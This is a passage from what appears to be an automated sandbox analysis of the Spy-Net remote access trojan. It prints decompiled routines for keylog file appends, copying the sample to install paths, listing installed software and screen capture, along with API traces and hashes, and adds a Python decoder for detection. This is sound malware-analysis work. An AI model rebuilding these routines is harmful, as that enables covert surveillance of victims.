                                    					_push(_v44);
                                    					_push(0x24022850);
                                    					_push(0x2402285c);
                                    					_push(_v8);
                                    					_push(0x24022850);
                                    					_push(0x24022850);
                                    					E240133FC();
                                    					// Reopen the existing log (3 = OPEN_EXISTING), seek to FILE_END (2) and append the line in _v8.
                                    					_t72 = CreateFileA(E24013534(_v16), 0x40000000, 2, 0, 3, 0, 0);
                                    					if(_t72 != 0xffffffff) { // INVALID_HANDLE_VALUE
                                    						SetFilePointer(_t72, 0, 0, 2);
                                    						_t62 = E2401333C(_v8);
                                    						WriteFile(_t72, E24013588( &_v8), _t62,  &_v12, 0);
                                    						CloseHandle(_t72);
                                    					}
                                    				}
                                    				_pop(_t76);
                                    				 *[fs:eax] = _t76;
                                    				_push(0x240227ce);
                                    				E240130AC( &_v44, 8);
                                    				return E24013088( &_v8);
                                    			}

                                    • Instruction address range: 0x24022638 - 0x240227c6

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,.txt,2.6,Spy-Net ,240227EC,?,00000000,240227C7,?,2405B9C4), ref: 240226C4
                                    • CloseHandle.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,.txt,2.6,Spy-Net ,240227EC,?,00000000,240227C7), ref: 240226CC
                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000003,00000000,00000000,24022850,24022850,?,2402285C,24022850,?,24022844,?,24022844), ref: 24022768
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,40000000,00000002,00000000,00000003,00000000,00000000,24022850,24022850,?,2402285C,24022850), ref: 2402277B
                                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000002,00000000,40000000,00000002,00000000,00000003,00000000,00000000), ref: 24022799
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000002,00000000,40000000,00000002,00000000,00000003,00000000), ref: 2402279F
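                                    The API lines above are the report's dump of the first 16 stack dwords at each call site, so only the leading entries are genuine parameters; the tail (including the ".txt", "2.6" and "Spy-Net " pointers and the 0x2402xxxx return addresses) is stale stack left by earlier pushes. The lpFileName slot reads 00000000 because the path was produced at run time and was not resolved. The decoder below is an added example, not part of the report or of the sample: it parses these lines (embedded as constructed input copied from the listing), keeps only the real parameters, names the Win32 constants, and flags the create-then-reopen-seek-end-write sequence that the keylog flush routine above produces. It also knows CopyFileA and SetFileAttributesA for the install routine E24052F20 further down. PARAM_COUNT and the pattern matcher are this example's own assumptions, not something the report states.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed input: the API trace lines of the keylog-flush routine, copied from the listing.
TRACE = """\
• CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,.txt,2.6,Spy-Net ,240227EC,?,00000000,240227C7,?,2405B9C4), ref: 240226C4
• CloseHandle.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,.txt,2.6,Spy-Net ,240227EC,?,00000000,240227C7), ref: 240226CC
• CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000003,00000000,00000000,24022850,24022850,?,2402285C,24022850,?,24022844,?,24022844), ref: 24022768
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,40000000,00000002,00000000,00000003,00000000,00000000,24022850,24022850,?,2402285C,24022850), ref: 2402277B
• WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000002,00000000,40000000,00000002,00000000,00000003,00000000,00000000), ref: 24022799
• CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000002,00000000,40000000,00000002,00000000,00000003,00000000), ref: 2402279F
"""

# Genuine parameter count per API (assumption of this example, taken from the Win32 prototypes).
# The report prints 16 stack dwords per call; everything past this count is stale stack.
PARAM_COUNT: Dict[str, int] = {
    "CreateFileA": 7, "CloseHandle": 1, "SetFilePointer": 4,
    "WriteFile": 5, "CopyFileA": 3, "SetFileAttributesA": 2,
}

GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
MOVE_METHOD = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}
FILE_ATTRIBUTES = {0x1: "FILE_ATTRIBUTE_READONLY", 0x2: "FILE_ATTRIBUTE_HIDDEN",
                   0x4: "FILE_ATTRIBUTE_SYSTEM", 0x80: "FILE_ATTRIBUTE_NORMAL"}

# "• Api.MODULE(arg,arg,...), ref: ADDR"; the bullet is optional.
LINE_RE = re.compile(r"^\s*•?\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]   # only the genuine parameters, as printed (hex or "?")
    ref: int          # address of the call site


def parse_trace(text: str) -> List[ApiCall]:
    """Parse report API lines, truncating each argument list to the real parameter count."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        api, module, raw_args, ref = m.groups()
        args = [a.strip() for a in raw_args.split(",")]
        calls.append(ApiCall(api, module, args[:PARAM_COUNT.get(api, len(args))], int(ref, 16)))
    return calls


def _int(arg: str) -> int:
    """Hex dword to int; '?' marks a slot the sandbox could not read and becomes -1."""
    try:
        return int(arg, 16)
    except ValueError:
        return -1


def _flags(value: int, table: Dict[int, str]) -> str:
    """Render a bit mask with the names from table; unknown bits are kept as hex."""
    names = [name for bit, name in table.items() if value & bit == bit]
    leftover = value & ~sum(table.keys())
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) if names else "0"


def decode(call: ApiCall) -> str:
    """Human-readable form of one call with its constants named."""
    a = call.args
    if call.api == "CreateFileA":
        return (f"CreateFileA(access={_flags(_int(a[1]), GENERIC_ACCESS)}, "
                f"share={_flags(_int(a[2]), SHARE_MODE)}, "
                f"disposition={DISPOSITION.get(_int(a[4]), a[4])})")
    if call.api == "SetFilePointer":
        return f"SetFilePointer(distance={_int(a[1])}, method={MOVE_METHOD.get(_int(a[3]), a[3])})"
    if call.api == "SetFileAttributesA":
        return f"SetFileAttributesA(attrs={_flags(_int(a[1]), FILE_ATTRIBUTES)})"
    if call.api == "CopyFileA":
        fie = _int(a[2])
        return f"CopyFileA(fail_if_exists={'unknown' if fie < 0 else bool(fie)})"
    return f"{call.api}({', '.join(a)})"


def is_append_to_log(calls: List[ApiCall]) -> bool:
    """True when the trace contains: CreateFileA(GENERIC_WRITE, OPEN_EXISTING) ->
    SetFilePointer(FILE_END) -> WriteFile -> CloseHandle, i.e. a line appended to a log."""
    seq = [c for c in calls if c.api in ("CreateFileA", "SetFilePointer", "WriteFile", "CloseHandle")]
    for i in range(len(seq) - 3):
        c0, c1, c2, c3 = seq[i:i + 4]
        if (c0.api == "CreateFileA" and _int(c0.args[1]) & 0x40000000 and _int(c0.args[4]) == 3
                and c1.api == "SetFilePointer" and _int(c1.args[3]) == 2
                and c2.api == "WriteFile" and c3.api == "CloseHandle"):
            return True
    return False


if __name__ == "__main__":
    trace = parse_trace(TRACE)
    for c in trace:
        print(f"{c.ref:08X}  {decode(c)}")
    print("append-to-log pattern:", is_append_to_log(trace))
```

Running it prints one decoded call per line and "append-to-log pattern: True" for the trace above. The interesting part for detection is the pattern, not the constants: CREATE_ALWAYS once when the file is missing, then OPEN_EXISTING plus a seek to FILE_END for every flush, which is how the routine grows the log without truncating it.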
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandle$PointerWrite
                                    • String ID: --- $.txt$2.6$Desktop$Spy-Net
                                    • API String ID: 2606874340-3792867649
                                    • Opcode ID: 8e216534eeddfb1cf8720cb4d3f8b3c6093c8a3450c7c608a61a00340cfc834f
                                    • Instruction ID: 6648cf1eb566d6334411ad375664f16ee18fc380b51f532edbf72a6296e9d5bf
                                    • Opcode Fuzzy Hash: 8e216534eeddfb1cf8720cb4d3f8b3c6093c8a3450c7c608a61a00340cfc834f
                                    • Instruction Fuzzy Hash: 2F415330940608BBFF01DBE1DC91F9E7BB8EB1C704F900468F604BA1D9D674ABC59A24
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 53%
                                    			E24052F20(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				char _v56;
                                    				char _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v96;
                                    				char _v100;
                                    				char _v104;
                                    				char _v108;
                                    				char _v112;
                                    				char _v116;
                                    				char _v120;
                                    				char _v124;
                                    				char _v128;
                                    				char _v132;
                                    				char _v136;
                                    				char _v140;
                                    				char _v144;
                                    				char _v148;
                                    				char _v152;
                                    				void* _t117;
                                    				void* _t118;
                                    				void* _t119;
                                    				void* _t120;
                                    				void* _t121;
                                    				void* _t122;
                                    				void* _t132;
                                    				CHAR* _t135;
                                    				intOrPtr* _t136;
                                    				void* _t145;
                                    				void* _t148;
                                    				void* _t154;
                                    				void* _t164;
                                    				CHAR* _t167;
                                    				intOrPtr* _t168;
                                    				void* _t177;
                                    				void* _t180;
                                    				void* _t186;
                                    				void* _t196;
                                    				CHAR* _t199;
                                    				intOrPtr* _t200;
                                    				void* _t209;
                                    				void* _t212;
                                    				void* _t218;
                                    				void* _t228;
                                    				CHAR* _t231;
                                    				intOrPtr* _t232;
                                    				void* _t241;
                                    				void* _t244;
                                    				void* _t250;
                                    				void* _t260;
                                    				CHAR* _t263;
                                    				intOrPtr* _t264;
                                    				void* _t273;
                                    				void* _t276;
                                    				void* _t282;
                                    				void* _t292;
                                    				CHAR* _t295;
                                    				intOrPtr* _t296;
                                    				void* _t305;
                                    				void* _t308;
                                    				void* _t314;
                                    				void* _t320;
                                    				intOrPtr _t326;
                                    				intOrPtr _t327;
                                    				intOrPtr _t368;
                                    				intOrPtr _t369;
                                    
                                    				_t366 = __esi;
                                    				_t319 = __ebx;
                                    				_t368 = _t369;
                                    				_t320 = 0x12;
                                    				goto L1;
                                    				L5:
                                    				_t118 = E2405272C(_t319, _t366, _t372);
                                    				_t373 = _t118;
                                    				if(_t118 != 0) {
                                    					// bFailIfExists = 0 (overwrite); stdcall pushes it before the path is built,
                                    					// so it is the argument the decompiler shows as ?? in CopyFileA below.
                                    					_push(0);
                                    					E240527D8( &_v36, _t319, _t366, _t373);
                                    					_push( &_v36);
                                    					E24052EDC(_v8, _t320,  &_v40);
                                    					_pop(_t260);
                                    					E24013344(_t260, _v40);
                                    					_t263 = E24013534(_v36);
                                    					_t264 =  *0x2405ac24; // 0x2405b980
                                    					// Source is the path stored at 0x2405ac24 (the running sample's own file);
                                    					// each block below repeats this copy for a different candidate install path.
                                    					CopyFileA(E24013534( *_t264), _t263, ??);
                                    					E240527D8( &_v44, _t319, _t366, _t373);
                                    					_push( &_v44);
                                    					E24052EDC(_v8, _t320,  &_v48);
                                    					_pop(_t273);
                                    					E24013344(_t273, _v48);
                                    					_t276 = E24016C78(_v44, _t319, _t373);
                                    					_t374 = _t276 - 1;
                                    					if(_t276 == 1) {
                                    						// 0x80 = FILE_ATTRIBUTE_NORMAL, the ?? argument of SetFileAttributesA below;
                                    						// applied only when E24016C78 (file-exists check) returns 1 for the copy.
                                    						_push(0x80);
                                    						E240527D8( &_v52, _t319, _t366, _t374);
                                    						_push( &_v52);
                                    						E24052EDC(_v8, _t320,  &_v56);
                                    						_pop(_t282);
                                    						E24013344(_t282, _v56);
                                    						SetFileAttributesA(E24013534(_v52), ??);
                                    					}
                                    				}
                                    				_t119 = E24052900(_t319, _t366, _t374);
                                    				_t375 = _t119;
                                    				if(_t119 != 0) {
                                    					_push(0);
                                    					E24052990( &_v60, _t319, _t366, _t375);
                                    					_push( &_v60);
                                    					E24052EDC(_v8, _t320,  &_v64);
                                    					_pop(_t228);
                                    					E24013344(_t228, _v64);
                                    					_t231 = E24013534(_v60);
                                    					_t232 =  *0x2405ac24; // 0x2405b980
                                    					CopyFileA(E24013534( *_t232), _t231, ??);
                                    					E24052990( &_v68, _t319, _t366, _t375);
                                    					_push( &_v68);
                                    					E24052EDC(_v8, _t320,  &_v72);
                                    					_pop(_t241);
                                    					E24013344(_t241, _v72);
                                    					_t244 = E24016C78(_v68, _t319, _t375);
                                    					_t376 = _t244 - 1;
                                    					if(_t244 == 1) {
                                    						_push(0x80);
                                    						E24052990( &_v76, _t319, _t366, _t376);
                                    						_push( &_v76);
                                    						E24052EDC(_v8, _t320,  &_v80);
                                    						_pop(_t250);
                                    						E24013344(_t250, _v80);
                                    						SetFileAttributesA(E24013534(_v76), ??);
                                    					}
                                    				}
                                    				_t120 = E24052AA4(_t319, _t366, _t376);
                                    				_t377 = _t120;
                                    				if(_t120 != 0) {
                                    					_push(0);
                                    					E24052B2C( &_v84, _t366, _t377);
                                    					_push( &_v84);
                                    					E24052EDC(_v8, _t320,  &_v88);
                                    					_pop(_t196);
                                    					E24013344(_t196, _v88);
                                    					_t199 = E24013534(_v84);
                                    					_t200 =  *0x2405ac24; // 0x2405b980
                                    					CopyFileA(E24013534( *_t200), _t199, ??);
                                    					E24052B2C( &_v92, _t366, _t377);
                                    					_push( &_v92);
                                    					E24052EDC(_v8, _t320,  &_v96);
                                    					_pop(_t209);
                                    					E24013344(_t209, _v96);
                                    					_t212 = E24016C78(_v92, _t319, _t377);
                                    					_t378 = _t212 - 1;
                                    					if(_t212 == 1) {
                                    						_push(0x80);
                                    						E24052B2C( &_v100, _t366, _t378);
                                    						_push( &_v100);
                                    						E24052EDC(_v8, _t320,  &_v104);
                                    						_pop(_t218);
                                    						E24013344(_t218, _v104);
                                    						SetFileAttributesA(E24013534(_v100), ??);
                                    					}
                                    				}
                                    				_t121 = E24052B9C(_t319, _t366, _t378);
                                    				_t379 = _t121;
                                    				if(_t121 != 0) {
                                    					_push(0);
                                    					E24052C28( &_v108, _t366, _t379);
                                    					_push( &_v108);
                                    					E24052EDC(_v8, _t320,  &_v112);
                                    					_pop(_t164);
                                    					E24013344(_t164, _v112);
                                    					_t167 = E24013534(_v108);
                                    					_t168 =  *0x2405ac24; // 0x2405b980
                                    					CopyFileA(E24013534( *_t168), _t167, ??);
                                    					E24052C28( &_v116, _t366, _t379);
                                    					_push( &_v116);
                                    					E24052EDC(_v8, _t320,  &_v120);
                                    					_pop(_t177);
                                    					E24013344(_t177, _v120);
                                    					_t180 = E24016C78(_v116, _t319, _t379);
                                    					_t380 = _t180 - 1;
                                    					if(_t180 == 1) {
                                    						_push(0x80);
                                    						E24052C28( &_v124, _t366, _t380);
                                    						_push( &_v124);
                                    						E24052EDC(_v8, _t320,  &_v128);
                                    						_pop(_t186);
                                    						E24013344(_t186, _v128);
                                    						SetFileAttributesA(E24013534(_v124), ??);
                                    					}
                                    				}
                                    				_t122 = E24052CD4(_t319, _t366, _t380);
                                    				_t381 = _t122;
                                    				if(_t122 != 0) {
                                    					_push(0);
                                    					E24052D64( &_v132, _t366, _t381);
                                    					_push( &_v132);
                                    					E24052EDC(_v8, _t320,  &_v136);
                                    					_pop(_t132);
                                    					E24013344(_t132, _v136);
                                    					_t135 = E24013534(_v132);
                                    					_t136 =  *0x2405ac24; // 0x2405b980
                                    					CopyFileA(E24013534( *_t136), _t135, ??);
                                    					E24052D64( &_v140, _t366, _t381);
                                    					_push( &_v140);
                                    					E24052EDC(_v8, _t320,  &_v144);
                                    					_pop(_t145);
                                    					E24013344(_t145, _v144);
                                    					_t148 = E24016C78(_v140, _t319, _t381);
                                    					_t382 = _t148 - 1;
                                    					if(_t148 == 1) {
                                    						_push(0x80);
                                    						E24052D64( &_v148, _t366, _t382);
                                    						_push( &_v148);
                                    						E24052EDC(_v8, _t320,  &_v152);
                                    						_pop(_t154);
                                    						E24013344(_t154, _v152);
                                    						SetFileAttributesA(E24013534(_v148), ??);
                                    					}
                                    				}
                                    				_pop(_t326);
                                    				 *[fs:eax] = _t326;
                                    				_pop(_t327);
                                    				 *[fs:eax] = _t327;
                                    				_push(0x240533b4);
                                    				return E240130AC( &_v152, 0x25);
                                    				L1:
                                    				_push(0);
                                    				_push(0);
                                    				_t320 = _t320 - 1;
                                    				_t370 = _t320;
                                    				if(_t320 != 0) {
                                    					goto L1;
                                    				} else {
                                    					_push(_t320);
                                    					_push(__ebx);
                                    					_push(__esi);
                                    					_v8 = __eax;
                                    					E24013524(_v8);
                                    					_push(_t368);
                                    					_push(0x240533ad);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t369;
                                    					_push(_t368);
                                    					_push(0x2405337e);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t369;
                                    					_t117 = E24052DDC(__ebx, __esi, _t370);
                                    					_t371 = _t117;
                                    					if(_t117 != 0) {
                                    						_push(0);
                                    						E24052E68( &_v12, __esi, _t371);
                                    						_push( &_v12);
                                    						E24052EDC(_v8, _t320,  &_v16);
                                    						_pop(_t292);
                                    						E24013344(_t292, _v16);
                                    						_t295 = E24013534(_v12);
                                    						_t296 =  *0x2405ac24; // 0x2405b980
                                    						CopyFileA(E24013534( *_t296), _t295, ??);
                                    						E24052E68( &_v20, _t366, _t371);
                                    						_push( &_v20);
                                    						E24052EDC(_v8, _t320,  &_v24);
                                    						_pop(_t305);
                                    						E24013344(_t305, _v24);
                                    						_t308 = E24016C78(_v20, __ebx, _t371);
                                    						_t372 = _t308 - 1;
                                    						if(_t308 == 1) {
                                    							_push(0x80);
                                    							E24052E68( &_v28, _t366, _t372);
                                    							_push( &_v28);
                                    							E24052EDC(_v8, _t320,  &_v32);
                                    							_pop(_t314);
                                    							E24013344(_t314, _v32);
                                    							SetFileAttributesA(E24013534(_v28), ??);
                                    						}
                                    					}
                                    					goto L5;
                                    				}
                                    			}

                                    • Instruction address range: 0x24052f20 - 0x240533ac
                                    0x24052f41
                                    0x24052f46
                                    0x24052f49
                                    0x24052f4e
                                    0x24052f4f
                                    0x24052f54
                                    0x24052f57
                                    0x24052f5a
                                    0x24052f5f
                                    0x24052f61
                                    0x24052f67
                                    0x24052f6c
                                    0x24052f74
                                    0x24052f7b
                                    0x24052f83
                                    0x24052f84
                                    0x24052f8c
                                    0x24052f92
                                    0x24052f9f
                                    0x24052fa7
                                    0x24052faf
                                    0x24052fb6
                                    0x24052fbe
                                    0x24052fbf
                                    0x24052fc7
                                    0x24052fcc
                                    0x24052fce
                                    0x24052fd0
                                    0x24052fd8
                                    0x24052fe0
                                    0x24052fe7
                                    0x24052fef
                                    0x24052ff0
                                    0x24052ffe
                                    0x24052ffe
                                    0x24052fce
                                    0x00000000
                                    0x24052f61

                                    APIs
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 24052F9F
                                    • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,2405337E,?,00000000,240533AD,?,?,?,?,00000011,00000000), ref: 24052FFE
                                    • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,2405337E,?,00000000,240533AD,?,?,?,?,00000011,00000000), ref: 240530A7
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 240530F1
                                    • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,2405337E,?,00000000,240533AD,?,?,?,?,00000011,00000000), ref: 24053150
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 2405319A
                                    • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,2405337E,?,00000000,240533AD,?,?,?,?,00000011,00000000), ref: 240531F9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 24053243
                                    • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,2405337E,?,00000000,240533AD,?,?,?,?,00000011,00000000), ref: 240532A2
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 240532F2
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 24053048
                                      • Part of subcall function 24016C78: FindFirstFileA.KERNEL32(00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CAD
                                      • Part of subcall function 24016C78: FindClose.KERNEL32(00000000,00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CB8
                                    • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,2405337E,?,00000000,240533AD,?,?,?,?,00000011,00000000), ref: 2405336F
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesCopy$Find$CloseFirst
                                    • String ID:
                                    • API String ID: 1833752699-0
                                    • Opcode ID: baa0f628fedeec8c09cefdb8316db3f2de23363fdab78c50d05acc47240591e8
                                    • Instruction ID: 359cfd7101aec429d7ef9f99eca062af60452f41dc83782b37c2ed1683cf7852
                                    • Opcode Fuzzy Hash: baa0f628fedeec8c09cefdb8316db3f2de23363fdab78c50d05acc47240591e8
                                    • Instruction Fuzzy Hash: B9D1D9759102489BEF10EBA4D980ECDB7B8FF68608F504565E108FB128DF74AEC68F54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 40%
                                    			E2403B9E4(char __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				void* _v12;
                                    				int _v16;
                                    				struct _FILETIME _v24;
                                    				int _v28;
                                    				int _v32;
                                    				int _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				char _v56;
                                    				char _v60;
                                    				char _v64;
                                    				char _v68;
                                    				void* _t61;
                                    				char* _t65;
                                    				char* _t105;
                                    				void* _t106;
                                    				intOrPtr _t119;
                                    				void* _t122;
                                    				int _t139;
                                    				intOrPtr* _t141;
                                    				intOrPtr _t143;
                                    				intOrPtr _t144;
                                    
                                    				_t143 = _t144;
                                    				_t106 = 8;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t106 = _t106 - 1;
                                    				} while (_t106 != 0);
                                    				_push(__ebx);
                                    				_t141 = __edx;
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				_push(_t143);
                                    				_push(0x2403bc14);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t144;
                                    				E24013088(_t141);
                                    				_t146 = _v8;
                                    				if(_v8 == 0) {
                                    					L13:
                                    					_pop(_t119);
                                    					 *[fs:eax] = _t119;
                                    					_push(0x2403bc1b);
                                    					E240130AC( &_v68, 0xb);
                                    					return E24013088( &_v8);
                                    				} else {
                                    					_push( &_v12);
                                    					_push(8);
                                    					_push(0);
                                    					_push( &_v40);
                                    					_push(E24013674(0x2403bc2c, _v8) + 1);
                                    					_t61 = E2401333C(_v8);
                                    					_pop(_t122);
                                    					E24013590(_v8, _t61, _t122);
                                    					_t65 = E24013534(_v40);
                                    					E24013590(_v8, E24013674(0x2403bc2c, _v8) - 1, 1,  &_v44);
                                    					RegOpenKeyExA(E2403B8AC(_v44, __ebx, _t146), _t65, ??, ??, ??);
                                    					_v16 = 0xff;
                                    					_t105 = E24011344(_v16);
                                    					_t139 = 0;
                                    					while(RegEnumKeyExA(_v12, _t139, _t105,  &_v16, 0, 0, 0,  &_v24) == 0) {
                                    						E24013274( &_v52, _t105);
                                    						E24013388( &_v48, _v52, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\");
                                    						E2403B7D8(_v48, _t105,  &_v28, "DisplayName", _t139, _t141, __eflags);
                                    						E24013274( &_v60, _t105);
                                    						E24013388( &_v56, _v60, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\");
                                    						E2403B7D8(_v56, _t105,  &_v32, "UninstallString", _t139, _t141, __eflags);
                                    						E24013274( &_v68, _t105);
                                    						E24013388( &_v64, _v68, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\");
                                    						E2403B7D8(_v64, _t105,  &_v36, "QuietUninstallString", _t139, _t141, __eflags);
                                    						__eflags = _v28;
                                    						if(_v28 != 0) {
                                    							_push( *_t141);
                                    							_push(_v28);
                                    							_push("##@@");
                                    							E240133FC();
                                    							__eflags = _v36;
                                    							if(_v36 == 0) {
                                    								__eflags = _v32;
                                    								if(_v32 == 0) {
                                    									_push( *_t141);
                                    									_push(0x2403bcf8);
                                    									_push("##@@");
                                    									_push("NNN");
                                    									_push("##@@");
                                    									_push(0x2403bce0);
                                    									E240133FC();
                                    								} else {
                                    									_push( *_t141);
                                    									_push(_v32);
                                    									_push("##@@");
                                    									_push("NNN");
                                    									_push("##@@");
                                    									_push(0x2403bce0);
                                    									E240133FC();
                                    								}
                                    							} else {
                                    								_push( *_t141);
                                    								_push(_v36);
                                    								_push("##@@");
                                    								_push("YYY");
                                    								_push("##@@");
                                    								_push(0x2403bce0);
                                    								E240133FC();
                                    							}
                                    						}
                                    						_t139 = _t139 + 1;
                                    						__eflags = _t139;
                                    						_v16 = 0xff;
                                    					}
                                    					RegCloseKey(_v12);
                                    					goto L13;
                                    				}
                                    			}

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,?,00000000,00000008,?,00000000,2403BC14,?,?,?,?,00000000,00000000), ref: 2403BA83
                                    • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,00000008,?,00000000), ref: 2403BBDB
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,000000FF,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,00000008,?), ref: 2403BBEC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnumOpen
                                    • String ID: ##@@$DisplayName$NNN$QuietUninstallString$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$UninstallString$YYY
                                    • API String ID: 1332880857-2804227269
                                    • Opcode ID: 564c9c8d713609c1f641bc7702e8563f38d20b6cd8f58eae5a57f6e5c29d2403
                                    • Instruction ID: e6b168dcf2a8f10ddfb81fe43d9b842120420963d320fc4a7a365377d4b13f95
                                    • Opcode Fuzzy Hash: 564c9c8d713609c1f641bc7702e8563f38d20b6cd8f58eae5a57f6e5c29d2403
                                    • Instruction Fuzzy Hash: A1512C30A20108ABEF10EA95C990FDEBFF9BF5860CF508065E514B725ADE749E86CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E240372D8(void* __eax, void* __edx) {
                                    				intOrPtr _v34;
                                    				short _v36;
                                    				short _v38;
                                    				intOrPtr _v42;
                                    				short _v44;
                                    				void _v56;
                                    				signed int _v60;
                                    				signed int _v64;
                                    				void* _v72;
                                    				void* _v76;
                                    				struct HDC__* _v80;
                                    				struct HBITMAP__* _v84;
                                    				intOrPtr _v100;
                                    				intOrPtr _v104;
                                    				struct HDC__* _v108;
                                    				struct tagBITMAPINFO* _t68;
                                    				void* _t73;
                                    				void* _t93;
                                    				signed int _t113;
                                    				struct tagBITMAPINFO* _t115;
                                    				DWORD _t116;
                                    				signed int* _t117;
                                    
                                    				_t117 =  &_v60;
                                    				_v72 = __edx;
                                    				_v76 = __eax;
                                    				_t116 = 0;
                                    				if(GetObjectA(_v72, 0x18,  &_v56) != 0) {
                                    					if(0x20 == 0x18) {
                                    						_t113 = 0;
                                    					} else {
                                    						_t113 = 1 << 0x20 << 2;
                                    					}
                                    					_v72 = E240372C4(0x20 * _v64) * _v60;
                                    					_t17 = _t113 + 0x28; // 0x29
                                    					_t115 = E24011344(_t17);
                                    					if(_t115 != 0) {
                                    						_t68 = _t115;
                                    						_t68->bmiHeader = 0x28;
                                    						_t68->bmiHeader.biWidth = _v64;
                                    						_t68->bmiHeader.biHeight = _v60;
                                    						_t68->bmiHeader.biPlanes = 1;
                                    						_t68->bmiHeader.biBitCount = 0x20;
                                    						_t68->bmiHeader.biCompression = 0;
                                    						_t68->bmiHeader.biSizeImage = _v72;
                                    						_t68->bmiHeader.biXPelsPerMeter = 0;
                                    						_t68->bmiHeader.biYPelsPerMeter = 0;
                                    						_t68->bmiHeader.biClrUsed = 0;
                                    						_t68->bmiHeader.biClrImportant = 0;
